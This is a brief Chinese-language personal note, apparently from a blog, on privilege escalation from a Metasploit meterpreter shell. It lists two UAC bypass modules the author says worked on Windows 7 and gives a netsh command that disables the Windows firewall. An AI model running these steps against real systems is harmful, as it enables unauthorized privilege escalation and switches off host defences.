---恢复内容开始---
从打开的meterpreter shell 打开 cmd
在cmd中运行wmic就可以得到系统相关信息
win10一些提权操作我都失败了
在win7中一下是我成功提权使用的模块
exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass(需要关闭防火墙)
exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
admin cmd 关闭防火墙命令
关闭防火墙:netsh firewall set opmode mode=disable